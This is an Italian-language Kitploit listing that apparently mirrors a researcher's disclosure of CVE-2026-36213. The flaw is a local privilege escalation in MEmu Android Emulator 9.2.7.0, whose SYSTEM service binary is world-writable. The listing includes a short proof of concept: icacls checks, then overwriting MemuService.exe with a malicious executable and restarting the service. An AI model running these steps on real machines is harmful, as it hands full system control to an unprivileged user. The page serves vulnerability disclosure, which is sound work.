Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-36213 — CVE-2026-36213 | Escalation dei privilegi locali in MEmu Android Emulator 9.2.7.0 tramite permessi non sicuri dei binari di servizio | Corretto nella 9.3.2 | Kitploit
Strumenti/GitHubGitHub/sec-zone/cve-2026-36213
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneBinary Exploitation
GitHubsec-zone/cve-2026-36213

CVE-2026-36213

CVE-2026-36213 | Escalation dei privilegi locali in MEmu Android Emulator 9.2.7.0 tramite permessi non sicuri dei binari di servizio | Corretto nella 9.3.2

Vedi Repository
5123 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-36213

CVE-2026-36213 | Escalation locale dei privilegi in MEmu Android Emulator 9.2.7.0 tramite permessi non sicuri del binario del servizio | Corretto in 9.3.2

CVE-2026-36213 — MEmu Android Emulator 9.2.7.0 LPE

CVE CVSS Status Platform

Riepilogo

Una vulnerabilità di escalation locale dei privilegi (LPE) in MEmu Android Emulator 9.2.7.0.
Il servizio MEmuSVC viene eseguito come NT AUTHORITY\SYSTEM mentre il suo binario è scrivibile da qualsiasi utente locale, consentendo la compromissione totale del sistema.

CampoDettagli
CVECVE-2026-36213
ProdottoMEmu Android Emulator (MicroVirt)
Versione interessata9.2.7.0 e precedenti
Versione corretta9.3.2
CWECWE-732 / CWE-269
CVSS v3.17.8 ALTA AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ATT&CKT1574.010

Vulnerabilità

MEmuService.exe viene installato come servizio Windows a livello SYSTEM con permessi NTFS non sicuri:

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

BUILTIN\Users:(F)   ← Any local user has Full Control
Everyone:(F)        ← World-writable binar

Prova di concetto

:: Passaggio 1 - Verifica dei permessi vulnerabili

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

:: Passaggio 2 - Sostituisci il binario (come utente con privilegi ridotti)

root@kitploit:~
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y

:: Passaggio 3 - Riavvia il servizio

root@kitploit:~
sc stop MEmuSVC && sc start MEmuSVC

:: Risultato: malicious.exe viene eseguito come NT AUTHORITY\SYSTEM

Script di rilevamento

Disponibile su: https://github.com/sec-zone/Hijack-service-binaries

Dichiarazione di non responsabilità

Questa ricerca è stata condotta a scopo didattico nell'ambito di una politica di divulgazione responsabile.
L'autore non è responsabile per qualsiasi uso improprio di queste informazioni.

Ricercatore

Nome: Mohammad Hossein Ashofte Yazdi
Linkedin: https://www.linkedin.com/in/seczone64
Twitter: @sec_zone64
Email: [email protected]

Scarica lo strumento